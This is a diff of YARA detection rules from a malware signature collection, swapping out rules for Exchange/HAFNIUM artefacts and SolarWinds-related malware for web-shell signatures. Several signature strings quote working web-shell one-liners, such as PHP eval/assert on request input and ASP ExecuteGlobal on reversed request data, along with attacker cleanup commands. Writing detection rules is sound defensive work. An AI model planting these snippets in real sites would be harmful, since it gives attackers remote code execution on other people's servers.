+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-03-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3478-L3493"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "61af81f0cd1eccba3a1000e6715c9715e8e67849e5edd4279728a7e47bd8cb75"
-		score = 75
+		hash = "14c7281fdaf2ae004ca5fec8753ce3cb"
+		logic_hash = "1c5eb355455c7fbd2b74d91f78e1d77f460dfeb4fe0ee65f18aa1453337b67a0"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2f159b71183a69928ba8f26b76772ec504aefeac71021b012bd006162e133731"
 
 	strings:
-		$s1 = "screen.exe" fullword wide
-		$s2 = "PlatformInvokeUSER32" fullword ascii
-		$s3 = "GetDesktopImageF" fullword ascii
-		$s4 = "PlatformInvokeGDI32" fullword ascii
-		$s5 = "GetDesktopImage" fullword ascii
-		$s6 = "Too many arguments, going to store in current dir" fullword wide
+		$s0 = "<[url=mailto:?@array_map($_GET[]?@array_map($_GET['f'],$_GET[/url]);?>" fullword
+		$s2 = ":https://forum.90sec.org/forum.php?mod=viewthread&tid=7316" fullword
+		$s3 = "@preg_replace(\"/f/e\",$_GET['u'],\"fengjiao\"); " fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 60KB and all of them )
+		1 of them
 }
-rule SIGNATURE_BASE_EXPL_LOG_CVE_2021_27065_Exchange_Forensic_Artefacts_Mar21_1 : LOG CVE_2021_27065
+rule SIGNATURE_BASE_Webshell_Webshells_New_Jjjsp2
 {
 	meta:
-		description = "Detects forensic artefacts found in HAFNIUM intrusions exploiting CVE-2021-27065"
+		description = "Web shells - generated from file JJJsp2.jsp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "dcc1f741-cab0-5a0b-a261-a6bd05989723"
-		date = "2021-03-02"
-		modified = "2023-12-05"
-		reference = "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hafnium_log_sigs.yar#L2-L13"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-03-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3494-L3510"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9306cf177928266ea921461e9da80ad5bb37e1e0848559898a414956cfbc2b49"
-		score = 75
+		hash = "5a9fec45236768069c99f0bfd566d754"
+		logic_hash = "47dca67c7a01035996d032cb3871da5532aea81ab6570c93c4a6b148fd95e9f9"
+		score = 70
 		quality = 85
-		tags = "LOG, CVE-2021-27065"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "S:CMD=Set-OabVirtualDirectory.ExternalUrl='" ascii wide fullword
+		$s2 = "QQ(cs, z1, z2, sb,z2.indexOf(\"-to:\")!=-1?z2.substring(z2.indexOf(\"-to:\")+4,z"
+		$s8 = "sb.append(l[i].getName() + \"/\\t\" + sT + \"\\t\" + l[i].length()+ \"\\t\" + sQ"
+		$s10 = "ResultSet r = s.indexOf(\"jdbc:oracle\")!=-1?c.getMetaData()"
+		$s11 = "return DriverManager.getConnection(x[1].trim()+\":\"+x[4],x[2].equalsIgnoreCase("
 
 	condition:
 		1 of them
 }
-rule SIGNATURE_BASE_EXPL_LOG_CVE_2021_26858_Exchange_Forensic_Artefacts_Mar21_1 : LOG CVE_2021_26858
+rule SIGNATURE_BASE_Webshell_Webshells_New_Radhat
 {
 	meta:
-		description = "Detects forensic artefacts found in HAFNIUM intrusions exploiting CVE-2021-26858"
+		description = "Web shells - generated from file radhat.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f6fa90c7-c2c0-56db-bf7b-dc146761a995"
-		date = "2021-03-02"
-		modified = "2021-03-04"
-		reference = "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hafnium_log_sigs.yar#L15-L28"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-03-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3511-L3524"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0a8296b7e990e52330412288e9ff71e08a5258fc63c4754e6d0e6d64302f55e6"
-		score = 65
-		quality = 60
-		tags = "LOG, CVE-2021-26858"
+		hash = "72cb5ef226834ed791144abaa0acdfd4"
+		logic_hash = "28d4d380b25da05a3be439bad72725fa49c947535dfeb5c24994a849c0592b81"
+		score = 70
+		quality = 85
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$xr1 = /POST (\/owa\/auth\/Current\/themes\/resources\/logon\.css|\/owa\/auth\/Current\/themes\/resources\/owafont_ja\.css|\/owa\/auth\/Current\/themes\/resources\/lgnbotl\.gif|\/owa\/auth\/Current\/themes\/resources\/owafont_ko\.css|\/owa\/auth\/Current\/themes\/resources\/SegoeUI-SemiBold\.eot|\/owa\/auth\/Current\/themes\/resources\/SegoeUI-SemiLight\.ttf|\/owa\/auth\/Current\/themes\/resources\/lgnbotl\.gif)/
+		$s1 = "sod=Array(\"D\",\"7\",\"S"
 
 	condition:
-		$xr1
+		all of them
 }
-rule SIGNATURE_BASE_LOG_Exchange_Forensic_Artefacts_Cleanup_Activity_Mar21_1 : LOG
+rule SIGNATURE_BASE_Webshell_Webshells_New_Asp1
 {
 	meta:
-		description = "Detects forensic artefacts showing cleanup activity found in HAFNIUM intrusions exploiting"
+		description = "Web shells - generated from file asp1.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "95b19544-147b-5496-b717-669cbc488179"
-		date = "2021-03-08"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/jdferrell3/status/1368626281970024448"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hafnium_log_sigs.yar#L48-L65"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-03-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3525-L3539"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "12e5b76dafcae13f1eb21913ae0bde233152fd8b9d29f073893418ac9f742de3"
+		hash = "b63e708cd58ae1ec85cf784060b69cad"
+		logic_hash = "6c76c5388825e29d333096d4cfa3782b7776f31b206a0ed5a8809428d698778b"
 		score = 70
 		quality = 85
-		tags = "LOG"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "cmd.exe /c cd /d C:/inetpub/wwwroot/aspnet_client" ascii wide
-		$x2 = "cmd.exe /c cd /d C:\\inetpub\\wwwroot\\aspnet_client" ascii wide
-		$s1 = "aspnet_client&del '"
-		$s2 = "aspnet_client&attrib +h +s +r "
-		$s3 = "&echo [S]"
+		$s0 = " http://www.baidu.com/fuck.asp?a=)0(tseuqer%20lave " fullword
+		$s2 = " <% a=request(chr(97)) ExecuteGlobal(StrReverse(a)) %>" fullword
 
 	condition:
-		1 of ( $x* ) or 2 of them
+		1 of them
 }
-rule SIGNATURE_BASE_EXPL_LOG_CVE_2021_27055_Exchange_Forensic_Artefacts : LOG
+rule SIGNATURE_BASE_Webshell_Webshells_New_Php6
 {
 	meta:
-		description = "Detects suspicious log entries that indicate requests as described in reports on HAFNIUM activity"
-		author = "Zach Stanford - @svch0st, Florian Roth"
-		id = "8b0110a9-fd03-5f7d-bdd8-03ff48bcac68"
-		date = "2021-03-10"
-		modified = "2021-03-15"
-		reference = "https://www.praetorian.com/blog/reproducing-proxylogon-exploit/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hafnium_log_sigs.yar#L67-L90"
+		description = "Web shells - generated from file php6.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-03-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3540-L3555"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "131ff0ce189dfeace0922000b0d15dfb5a1270bee8fba8e4d66aa75b1d3f864f"
-		score = 65
-		quality = 35
-		tags = "LOG"
+		hash = "ea75280224a735f1e445d244acdfeb7b"
+		logic_hash = "495dc6c6769b8605ea946c012ad0ebb54685e7e91afd383027640753d90c6b3f"
+		score = 70
+		quality = 85
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "ServerInfo~" ascii wide
-		$sr1 = /\/ecp\/[0-9a-zA-Z]{1,3}\.js/ ascii wide
-		$s1 = "/ecp/auth/w.js" ascii wide
-		$s2 = "/owa/auth/w.js" ascii wide
-		$s3 = "/owa/auth/x.js" ascii wide
-		$s4 = "/ecp/main.css" ascii wide
-		$s5 = "/ecp/default.flt" ascii wide
-		$s6 = "/owa/auth/Current/themes/resources/logon.css" ascii wide
+		$s1 = "array_map(\"asx73ert\",(ar"
+		$s3 = "preg_replace(\"/[errorpage]/e\",$page,\"saft\");" fullword
+		$s4 = "shell.php?qid=zxexp  " fullword
 
 	condition:
-		$x1 and 1 of ( $s* )
+		1 of them
 }
-rule SIGNATURE_BASE_LOG_CVE_2021_27065_Exchange_Forensic_Artefacts_Mar21_2 : LOG
+rule SIGNATURE_BASE_Webshell_Webshells_New_Xxx
 {
 	meta:
-		description = "Detects suspicious log entries that indicate requests as described in reports on HAFNIUM activity"
+		description = "Web shells - generated from file xxx.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "37a26def-b360-518e-a4ab-9604a5b39afd"
-		date = "2021-03-10"
-		modified = "2023-12-05"
-		reference = "https://www.praetorian.com/blog/reproducing-proxylogon-exploit/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hafnium_log_sigs.yar#L92-L104"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-03-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3556-L3569"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "13e2e46689bc0e87c3cf13dc2ce213c384afe6c03c21e62a467974a0518c12da"
-		score = 65
-		quality = 60
-		tags = "LOG"
+		hash = "0e71428fe68b39b70adb6aeedf260ca0"
+		logic_hash = "837ed266af8a65ac683be39c32509df34bc8041b336a71c12700ca73bf210b4d"
+		score = 70
+		quality = 85
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$sr1 = /GET \/rpc\/ &CorrelationID=<empty>;&RequestId=[^\n]{40,600} (200|301|302)/
+		$s3 = "<?php array_map(\"ass\\x65rt\",(array)$_REQUEST['expdoor']);?>" fullword
 
 	condition:
-		$sr1
+		all of them
 }
-rule SIGNATURE_BASE_HKTL_Koh_Tokenstealer : FILE
+rule SIGNATURE_BASE_Webshell_Getpostphp
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project."
-		author = "Will Schroeder (@harmj0y)"
-		id = "76b6cc9f-5db7-5e9b-939c-e713bad8137a"
-		date = "2022-07-09"
-		modified = "2023-12-05"
-		reference = "https://github.com/GhostPack/Koh"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_hktl_koh_tokenstealer.yar#L2-L18"
+		description = "Web shells - generated from file GetPostpHp.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-03-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3570-L3583"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e2c4d948e23f1a3a92689f35fedde6e041d09cd88deac9ff3249556be0b8f789"
-		score = 75
+		hash = "20ede5b8182d952728d594e6f2bb5c76"
+		logic_hash = "e75f66200593c3fdaadf1881235847f6c3f3caadcb7ffe13e8b01bce5f922702"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x_typelibguid = "4d5350c8-7f8c-47cf-8cde-c752018af17e" ascii
-		$s1 = "[*] Already SYSTEM, not elevating" wide fullword
-		$s2 = "S-1-[0-59]-\\d{2}-\\d{8,10}-\\d{8,10}-\\d{8,10}-[1-9]\\d{2}" wide
-		$s3 = "0x[0-9A-Fa-f]+$" wide
-		$s4 = "\\Koh.pdb" ascii
+		$s0 = "<?php eval(str_rot13('riny($_CBFG[cntr]);'));?>" fullword
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 1 of ( $x* ) or 3 of them
+		all of them
 }
-rule SIGNATURE_BASE_APT_Backdoor_SUNBURST_1
+rule SIGNATURE_BASE_Webshell_Webshells_New_Php5
 {
 	meta:
-		description = "This rule is looking for portions of the SUNBURST backdoor that are vital to how it functions. The first signature fnv_xor matches a magic byte xor that the sample performs on process, service, and driver names/paths. SUNBURST is a backdoor that has the ability to spawn and kill processes, write and delete files, set and create registry keys, gather system information, and disable a set of forensic analysis tools and services."
-		author = "FireEye"
-		id = "74b44844-5575-53d7-819b-ab1b2327a144"
-		date = "2020-12-14"
-		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_solarwinds_sunburst.yar#L6-L27"
+		description = "Web shells - generated from file php5.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-03-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3584-L3597"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1fc006dead2fd540717e00e468bf30f37bdb1d061a805e33683e4a77db7f9156"
-		score = 85
-		quality = 77
+		hash = "cf2ab009cbd2576a806bfefb74906fdf"
+		logic_hash = "280be378bc6cf52ef9454083180015ed00f9d0bc936620a4105c34c3a3002383"
+		score = 70
+		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$cmd_regex_encoded = "U4qpjjbQtUzUTdONrTY2q42pVapRgooABYxQuIZmtUoA" wide
-		$cmd_regex_plain = { 5C 7B 5B 30 2D 39 61 2D 66 2D 5D 7B 33 36 7D 5C 7D 22 7C 22 5B 30 2D 39 61 2D 66 5D 7B 33 32 7D 22 7C 22 5B 30 2D 39 61 2D 66 5D 7B 31 36 7D }
-		$fake_orion_event_encoded = "U3ItS80rCaksSFWyUvIvyszPU9IBAA==" wide
-		$fake_orion_event_plain = { 22 45 76 65 6E 74 54 79 70 65 22 3A 22 4F 72 69 6F 6E 22 2C }
-		$fake_orion_eventmanager_encoded = "U3ItS80r8UvMTVWyUgKzfRPzEtNTi5R0AA==" wide
-		$fake_orion_eventmanager_plain = { 22 45 76 65 6E 74 4E 61 6D 65 22 3A 22 45 76 65 6E 74 4D 61 6E 61 67 65 72 22 2C }
-		$fake_orion_message_encoded = "U/JNLS5OTE9VslKqNqhVAgA=" wide
-		$fake_orion_message_plain = { 22 4D 65 73 73 61 67 65 22 3A 22 7B 30 7D 22 }
-		$fnv_xor = { 67 19 D8 A7 3B 90 AC 5B }
+		$s0 = "<?$_uU=chr(99).chr(104).chr(114);$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_u"
 
 	condition:
-		$fnv_xor and ( $cmd_regex_encoded or $cmd_regex_plain ) or ( ( $fake_orion_event_encoded or $fake_orion_event_plain ) and ( $fake_orion_eventmanager_encoded or $fake_orion_eventmanager_plain ) and ( $fake_orion_message_encoded and $fake_orion_message_plain ) )
+		all of them
 }
-rule SIGNATURE_BASE_APT_Backdoor_SUNBURST_2
+rule SIGNATURE_BASE_Webshell_Webshells_New_PHP
 {
 	meta:
-		description = "The SUNBURST backdoor uses a domain generation algorithm (DGA) as part of C2 communications. This rule is looking for each branch of the code that checks for which HTTP method is being used. This is in one large conjunction, and all branches are then tied together via disjunction. The grouping is intentionally designed so that if any part of the DGA is re-used in another sample, this signature should match that re-used portion. SUNBURST is a backdoor that has the ability to spawn and kill processes, write and delete files, set and create registry keys, gather system information, and disable a set of forensic analysis tools and services."
-		author = "FireEye"
-		id = "329071d5-c9c6-5ae1-a514-aea9f4037bac"
-		date = "2020-12-14"
-		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_solarwinds_sunburst.yar#L28-L79"
+		description = "Web shells - generated from file PHP.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-03-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3598-L3615"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2bf0697b110bca88f712cbccaf0d2ba614d6093d6d9595659aefe088848d3826"
-		score = 85
-		quality = 83
+		hash = "a524e7ae8d71e37d2fd3e5fbdab405ea"
+		logic_hash = "706f835f63e153f907ae8a5a48f1dc4b9d3b8511b21b7155bc045b0ebdc893fc"
+		score = 70
+		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a = "0y3Kzy8BAA==" wide
-		$aa = "S8vPKynWL89PS9OvNqjVrTYEYqNa3fLUpDSgTLVxrR5IzggA" wide
-		$ab = "S8vPKynWL89PS9OvNqjVrTYEYqPaauNaPZCYEQA=" wide
-		$ac = "C88sSs1JLS4GAA==" wide
-		$ad = "C/UEAA==" wide
-		$ae = "C89MSU8tKQYA" wide
-		$af = "8wvwBQA=" wide
-		$ag = "cyzIz8nJBwA=" wide
-		$ah = "c87JL03xzc/LLMkvysxLBwA=" wide
-		$ai = "88tPSS0GAA==" wide
-		$aj = "C8vPKc1NLQYA" wide
-		$ak = "88wrSS1KS0xOLQYA" wide
-		$al = "c87PLcjPS80rKQYA" wide
-		$am = "Ky7PLNAvLUjRBwA=" wide
-		$an = "06vIzQEA" wide
-		$b = "0y3NyyxLLSpOzIlPTgQA" wide
-		$c = "001OBAA=" wide
-		$d = "0y0oysxNLKqMT04EAA==" wide
-		$e = "0y3JzE0tLknMLQAA" wide
-		$f = "003PyU9KzAEA" wide
-		$h = "0y1OTS4tSk1OBAA=" wide
-		$i = "K8jO1E8uytGvNqitNqytNqrVA/IA" wide
-		$j = "c8rPSQEA" wide
-		$k = "c8rPSfEsSczJTAYA" wide
-		$l = "c60oKUp0ys9JAQA=" wide
-		$m = "c60oKUp0ys9J8SxJzMlMBgA=" wide
-		$n = "8yxJzMlMBgA=" wide
-		$o = "88lMzygBAA==" wide
-		$p = "88lMzyjxLEnMyUwGAA==" wide
-		$q = "C0pNL81JLAIA" wide
-		$r = "C07NzXTKz0kBAA==" wide
-		$s = "C07NzXTKz0nxLEnMyUwGAA==" wide
-		$t = "yy9IzStOzCsGAA==" wide
-		$u = "y8svyQcA" wide
-		$v = "SytKTU3LzysBAA==" wide
-		$w = "C84vLUpOdc5PSQ0oygcA" wide
-		$x = "C84vLUpODU4tykwLKMoHAA==" wide
-		$y = "C84vLUpO9UjMC07MKwYA" wide
-		$z = "C84vLUpO9UjMC04tykwDAA==" wide
+		$s1 = "echo \"<font color=blue>Error!</font>\";" fullword
+		$s2 = "<input type=\"text\" size=61 name=\"f\" value='<?php echo $_SERVER[\"SCRIPT_FILE"
+		$s5 = " - ExpDoor.com</title>" fullword
+		$s10 = "$f=fopen($_POST[\"f\"],\"w\");" fullword
+		$s12 = "<textarea name=\"c\" cols=60 rows=15></textarea><br>" fullword
 
 	condition:
-		($a and $b and $c and $d and $e and $f and $h and $i ) or ( $j and $k and $l and $m and $n and $o and $p and $q and $r and $s and ( $aa or $ab ) ) or ( $t and $u and $v and $w and $x and $y and $z and ( $aa or $ab ) ) or ( $ac and $ad and $ae and $af and $ag and $ah and ( $am or $an ) ) or ( $ai and $aj and $ak and $al and ( $am or $an ) )
+		1 of them
 }
-
-rule SIGNATURE_BASE_APT_Webshell_SUPERNOVA_1 : FILE
+rule SIGNATURE_BASE_Webshell_Webshells_New_Asp
 {
 	meta:
-		description = "SUPERNOVA is a .NET web shell backdoor masquerading as a legitimate SolarWinds web service handler. SUPERNOVA inspects and responds to HTTP requests with the appropriate HTTP query strings, Cookies, and/or HTML form values (e.g. named codes, class, method, and args). This rule is looking for specific strings and attributes related to SUPERNOVA."
-		author = "FireEye"
-		id = "73a27fa2-a846-5f4b-8182-064ac06c71a8"
-		date = "2020-12-14"
-		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_solarwinds_sunburst.yar#L80-L99"
+		description = "Web shells - generated from file Asp.asp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-03-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3616-L3631"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8471e6b3675e7e9ccfe5b81ab4c599668f2de528f3b179a675f50aa1fd7814b2"
-		score = 85
-		quality = 81
-		tags = "FILE"
+		hash = "32c87744ea404d0ea0debd55915010b7"
+		logic_hash = "dd2e9f753e8fa781c28c2d5bb9336bb3f39ed8a496bd89eb54bc1812ef512ab5"
+		score = 70
+		quality = 85
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$compile1 = "CompileAssemblyFromSource"
-		$compile2 = "CreateCompiler"
-		$context = "ProcessRequest"
-		$httpmodule = "IHttpHandler" ascii
-		$string1 = "clazz"
-		$string2 = "//NetPerfMon//images//NoLogo.gif" wide
-		$string3 = "SolarWinds" ascii nocase wide
+		$s1 = "Execute MorfiCoder(\")/*/z/*/(tseuqer lave\")" fullword
+		$s2 = "Function MorfiCoder(Code)" fullword
+		$s3 = "MorfiCoder=Replace(Replace(StrReverse(Code),\"/*/\",\"\"\"\"),\"\\*\\\",vbCrlf)" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 10KB and pe.imports ( "mscoree.dll" , "_CorDllMain" ) and $httpmodule and $context and all of ( $compile* ) and all of ( $string* )
+		1 of them
 }
-rule SIGNATURE_BASE_APT_Webshell_SUPERNOVA_2 : FILE
+rule SIGNATURE_BASE_Perlbot_Pl
 {
 	meta:
-		description = "This rule is looking for specific strings related to SUPERNOVA. SUPERNOVA is a .NET web shell backdoor masquerading as a legitimate SolarWinds web service handler. SUPERNOVA inspects and responds to HTTP requests with the appropriate HTTP query strings, Cookies, and/or HTML form values (e.g. named codes, class, method, and args)."
-		author = "FireEye"
-		id = "c39bf9ba-fd62-5619-92b6-1633375ef197"
-		date = "2020-12-14"
-		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_solarwinds_sunburst.yar#L100-L118"
+		description = "Semi-Auto-generated  - file perlbot.pl.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "378cb0e4-2069-50b7-ab3e-5a81055e9983"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3635-L3646"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "96e344bd2ba3ee07784852db3e9935352762c2fa7b6be88f00cac10a90706ffc"
-		score = 85
-		quality = 83
-		tags = "FILE"
+		hash = "7e4deb9884ffffa5d82c22f8dc533a45"
+		logic_hash = "784980d620e71fb0cf5aed9ef8bd171a8f50d850bc782645575070b75c42e426"
+		score = 75
+		quality = 85
+		tags = ""
 
 	strings:
-		$dynamic = "DynamicRun"
-		$solar = "Solarwinds" nocase
-		$string1 = "codes"
-		$string2 = "clazz"
-		$string3 = "method"
-		$string4 = "args"
+		$s0 = "my @adms=(\"Kelserific\",\"Puna\",\"nod32\")"
+		$s1 = "#Acesso a Shel - 1 ON 0 OFF"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 10KB and 3 of ( $string* ) and $dynamic and $solar
+		1 of them
 }
-rule SIGNATURE_BASE_APT_Hacktool_PS1_COSMICGALE_1
+rule SIGNATURE_BASE_Php_Backdoor_Php
 {
 	meta:
-		description = "This rule detects various unique strings related to COSMICGALE. COSMICGALE is a credential theft and reconnaissance PowerShell script that collects credentials using the publicly available Get-PassHashes routine. COSMICGALE clears log files, writes acquired data to a hard coded path, and encrypts the file with a password."
-		author = "FireEye"
-		id = "c094943c-288e-5835-8066-8e95a992c76c"
-		date = "2020-12-14"
-		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_solarwinds_sunburst.yar#L119-L140"
+		description = "Semi-Auto-generated  - file php-backdoor.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "aca53071-f793-538d-bbeb-34469cdb4d1f"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3647-L3659"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c7b4d3c29d57b8db8d21e3a436c83617bc3fe14e66ccc1500b33a3774f09ee12"
-		score = 85
-		quality = 40
+		hash = "2b5cb105c4ea9b5ebc64705b4bd86bf7"
+		logic_hash = "acab82b40760b45d49da51953f78c69166955de54918634c9bfe394208cdbb56"
+		score = 75
+		quality = 85
 		tags = ""
 
 	strings:
